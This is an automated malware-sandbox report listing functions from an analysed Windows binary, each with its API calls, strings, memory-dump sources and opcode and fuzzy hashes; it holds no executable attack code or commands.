Instruction ID: fef867284bc82256ac7d96a3cb2a6608b49a7f685f92d441d67dad76f9306fc8
Opcode Fuzzy Hash: c388d561f18845eefa9ba5886733b62f294d3be39d150a353a8dfd5152337e8b
Instruction Fuzzy Hash: AE1182A0A6016DB9D724A765CC8ADFF7B7CFFD2F00F400569B505A21D1DF681D05C5A1

Function 007A48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007A490E
gethostname.WSOCK32(?,00000100), ref: 007A4928
gethostbyname.WSOCK32(?), ref: 007A4935
_wcscpy.LIBCMT ref: 007A495D
_memmove.LIBCMT ref: 007A4970
inet_ntoa.WSOCK32(?), ref: 007A497B
_strcat.LIBCMT ref: 007A4989
_wcscpy.LIBCMT ref: 007A49A0
WSACleanup.WSOCK32 ref: 007A49AE
_wcscpy.LIBCMT ref: 007A49BC

Strings

0.0.0.0, xrefs: 007A4957

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 76126be4c507e5d0cd6636955e3fa58c78c493c4f963b670acbdaebe7befd31a
Instruction ID: db5c5bfda80acaa7bb2794f9856f36d9c24522f4ac71fb47bf17fc027e364233
Opcode Fuzzy Hash: 76126be4c507e5d0cd6636955e3fa58c78c493c4f963b670acbdaebe7befd31a
Instruction Fuzzy Hash: 8711E731904114EFCB24EB24DC0AEDB77BCDF82720F04427AF845A6091EFBDAA928651

Function 007A5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007A521C

Part of subcall function 00760719: timeGetTime.WINMM(?,75C0B400,00750FF9), ref: 0076071D

Sleep.KERNEL32(0000000A), ref: 007A5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007A526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007A528E
SetActiveWindow.USER32 ref: 007A52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 007A52DA
Sleep.KERNEL32(000000FA), ref: 007A52E5
IsWindow.USER32 ref: 007A52F1
EndDialog.USER32(00000000), ref: 007A5302

Strings

BUTTON, xrefs: 007A5280

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: d85ee38791bb967ce362751ee95982cde5eeec47954249376dfac519710a735c
Instruction ID: 792e1cd704f1825d005f3ae8163e15099e4bc18efe333df247860f62515d85ed
Opcode Fuzzy Hash: d85ee38791bb967ce362751ee95982cde5eeec47954249376dfac519710a735c
Instruction Fuzzy Hash: A121A1B0204744BFEB405F20EC88F663B6AFBD6346F045528F501921B1DBADAC508B25

Function 007AD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

CoInitialize.OLE32(00000000), ref: 007AD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007AD8E8
SHGetDesktopFolder.SHELL32(?), ref: 007AD8FC
CoCreateInstance.OLE32(007D2D7C,00000000,00000001,007FA89C,?), ref: 007AD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007AD9B7
CoTaskMemFree.OLE32(?,?), ref: 007ADA0F
_memset.LIBCMT ref: 007ADA4C
SHBrowseForFolderW.SHELL32(?), ref: 007ADA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007ADAAB
CoTaskMemFree.OLE32(00000000), ref: 007ADAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007ADAE9
CoUninitialize.OLE32(00000001,00000000), ref: 007ADAEB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 5be9a583bd21d50a54765546a0d0c670d01c2e319006b5c464f03ecd60d33dd8
Instruction ID: ecf4eaec47f047ebd26218b62b29bdf6dce6f2bea5cec10cfb1bc3bc9a30f388
Opcode Fuzzy Hash: 5be9a583bd21d50a54765546a0d0c670d01c2e319006b5c464f03ecd60d33dd8
Instruction Fuzzy Hash: BCB1FC75A00109EFDB14DF64C888DAEBBF9EF89314B048569F90AEB251DB34EE45CB50

Function 007A052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007A05A7
SetKeyboardState.USER32(?), ref: 007A0612
GetAsyncKeyState.USER32(000000A0), ref: 007A0632
GetKeyState.USER32(000000A0), ref: 007A0649
GetAsyncKeyState.USER32(000000A1), ref: 007A0678
GetKeyState.USER32(000000A1), ref: 007A0689
GetAsyncKeyState.USER32(00000011), ref: 007A06B5
GetKeyState.USER32(00000011), ref: 007A06C3
GetAsyncKeyState.USER32(00000012), ref: 007A06EC
GetKeyState.USER32(00000012), ref: 007A06FA
GetAsyncKeyState.USER32(0000005B), ref: 007A0723
GetKeyState.USER32(0000005B), ref: 007A0731

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
Instruction ID: 2ba3b2796deee0fdeb28e20380077d7f96aab53155500692bca2243a2c6fc6bf
Opcode Fuzzy Hash: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
Instruction Fuzzy Hash: F651CD20E0478859FB35DBA08854BEAAFB59F83380F484B99D5C1571C2D66CAA4CCF95

Function 0079C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0079C746
GetWindowRect.USER32(00000000,?), ref: 0079C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079C7B6
GetDlgItem.USER32(?,00000002), ref: 0079C7C1
GetWindowRect.USER32(00000000,?), ref: 0079C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079C827
GetDlgItem.USER32(?,000003E9), ref: 0079C835
GetWindowRect.USER32(00000000,?), ref: 0079C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079C889
GetDlgItem.USER32(?,000003EA), ref: 0079C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0079C8C1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
Instruction ID: 80ff444198236a765d276aa4430a3cfbbeb5680e4baaac8fe05e536f176992c1
Opcode Fuzzy Hash: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
Instruction Fuzzy Hash: 99513E71B00205AFDF18CFA9DD99EAEBBBAEB88310F14812DF516E7290D7749D008B54

Function 0074201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007420D3
KillTimer.USER32(-00000001,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0074216E
DestroyAcceleratorTable.USER32(00000000), ref: 0077BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF5A
DeleteObject.GDI32(00000000), ref: 0077BF6C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: f3320587614b92a1dbac0fcb85a2c04a8e18a7240ed489c4a4c8dcf791f4bac8
Instruction ID: 7a59ce8a8ed324dfbfe534505e14623b4e9682edcdf411caf25c758799beb303
Opcode Fuzzy Hash: f3320587614b92a1dbac0fcb85a2c04a8e18a7240ed489c4a4c8dcf791f4bac8
Instruction Fuzzy Hash: 4D618630100610DFCB65AF14DD48B2AB7F2FB50716F90C52DE1468AAB2C779A8B2DF90

Function 007421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

GetSysColor.USER32(0000000F), ref: 007421D3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f52b7a10208fb3bb814790810cb9634a44c0bf08967761cf7463e6a942b92425
Instruction ID: 2214e6ecd2a91dc7d0fbd7a67e9a197fc02cd4738766cd968a908dfda65a7e45
Opcode Fuzzy Hash: f52b7a10208fb3bb814790810cb9634a44c0bf08967761cf7463e6a942b92425
Instruction Fuzzy Hash: 1341B3311001549FDB215F28EC48BB93B66FB06331F998269FE658A1E2C7798C52DB25

Function 007AAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,007CF910), ref: 007AAB76
GetDriveTypeW.KERNEL32(00000061,007FA620,00000061), ref: 007AAC40
_wcscpy.LIBCMT ref: 007AAC6A

Strings

removable, xrefs: 007AABA8
ramdisk, xrefs: 007AABEA
all, xrefs: 007AAB7C
network, xrefs: 007AABD4
cdrom, xrefs: 007AAB92
unknown, xrefs: 007AAC01
fixed, xrefs: 007AABBE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 063743e3695365ff003e12d56d43db94ae9bdaea7e5cfa519e5dfbd56c3e5087
Instruction ID: 66e8192ed97b2c01f90bca22d9c7344e9f7e955e68e2c75d6b143ec76966a525
Opcode Fuzzy Hash: 063743e3695365ff003e12d56d43db94ae9bdaea7e5cfa519e5dfbd56c3e5087
Instruction Fuzzy Hash: 2651A271208305EBC714EF14C885AAFB7A5EF85310F148A2DF596572A2DB39DD09CB63

Function 00749997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 007499C2
__swprintf.LIBCMT ref: 00749A0C
__i64tow.LIBCMT ref: 0077FA0F

Strings

%.15g, xrefs: 00749A06
False, xrefs: 0077F9D7
True, xrefs: 0077F9D0
0x%p, xrefs: 0077F9F1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: db51ed75096d7ec74a6df1c0cface20eb262b4ba8e529c0beaff474987361971
Instruction ID: 287ffd24f2bf493019eac87aa0e1cae21ea87f0d3d831335982298a2d9ae7390
Opcode Fuzzy Hash: db51ed75096d7ec74a6df1c0cface20eb262b4ba8e529c0beaff474987361971
Instruction Fuzzy Hash: 3641A271604205EEDF249B38D946E7773E8EB45300F24846EEA4ED7291EB79A942CB11

Function 007C73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C73D9
CreateMenu.USER32 ref: 007C73F4
SetMenu.USER32(?,00000000), ref: 007C7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C7490
IsMenu.USER32(?), ref: 007C74A6
CreatePopupMenu.USER32 ref: 007C74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C74DD
DrawMenuBar.USER32 ref: 007C74E5

Strings

0, xrefs: 007C73CF
F, xrefs: 007C74D1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: e7ca4cf748910632df43bdee5529c73daa0e16e82b29da3b81885126c42f29b7
Instruction ID: db49ad92475e6a19ed415bfa48877f3156cac1cf73addf8a2276ef93326f2edb
Opcode Fuzzy Hash: e7ca4cf748910632df43bdee5529c73daa0e16e82b29da3b81885126c42f29b7
Instruction Fuzzy Hash: 3C411775A00245EFDB18DF64E844F9ABBB9FF49310F14402DEA5597350DB39AA20CF54

Function 007C772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007C77CD
CreateCompatibleDC.GDI32(00000000), ref: 007C77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007C77E7
SelectObject.GDI32(00000000,00000000), ref: 007C77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 007C77FA
DeleteDC.GDI32(00000000), ref: 007C7803
GetWindowLongW.USER32(?,000000EC), ref: 007C780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007C7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007C782D

Strings

static, xrefs: 007C7765

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: ba00eed722582efd8d54c8d622483ff2afdbff299c62e4f4bad8c886240a7241
Instruction ID: 7830611b7099bcab730d472afea017144b44b06f7345f37410367506882f5e77
Opcode Fuzzy Hash: ba00eed722582efd8d54c8d622483ff2afdbff299c62e4f4bad8c886240a7241
Instruction Fuzzy Hash: AA316D31105119EBDF159FB4DC09FDA3BAAFF09724F11422DFA15A61A0CB39D821DBA4

Function 00767040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0076707B

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

__gmtime64_s.LIBCMT ref: 00767114
__gmtime64_s.LIBCMT ref: 0076714A
__gmtime64_s.LIBCMT ref: 00767167
__allrem.LIBCMT ref: 007671BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007671D9
__allrem.LIBCMT ref: 007671F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0076720E
__allrem.LIBCMT ref: 00767225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00767243
__invoke_watson.LIBCMT ref: 007672B4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 3b310847c9de38a220455a5ef1d5c2b70665dbee75ca86533d60aaadfd52eb9e
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 62711971A04706EBDB189E78CC41B5AB3B8BF113A8F14822AFC15E7681E778D940C7A0

Function 007A2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2A31
GetMenuItemInfoW.USER32(00806890,000000FF,00000000,00000030), ref: 007A2A92
SetMenuItemInfoW.USER32(00806890,00000004,00000000,00000030), ref: 007A2AC8
Sleep.KERNEL32(000001F4), ref: 007A2ADA
GetMenuItemCount.USER32(?), ref: 007A2B1E
GetMenuItemID.USER32(?,00000000), ref: 007A2B3A
GetMenuItemID.USER32(?,-00000001), ref: 007A2B64
GetMenuItemID.USER32(?,?), ref: 007A2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2C24

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 63f3c77a391f93bd7908b7cbc7dc6445678efc86f74a99e1744f20947a77ff8c
Instruction ID: d9ee4ad0d84f1a7eaf26f1f4fd6f29280714083bddc63a3a534f9f834cbe52b8
Opcode Fuzzy Hash: 63f3c77a391f93bd7908b7cbc7dc6445678efc86f74a99e1744f20947a77ff8c
Instruction Fuzzy Hash: 3E61B4B0900249EFDB11CF58DD88DBEBBB9FB86314F144659E84193252E739AD16DB30

Function 007C7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C7217
GetWindowLongW.USER32(?,000000F0), ref: 007C723B
_memset.LIBCMT ref: 007C724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C72D6

Memory Dump Source

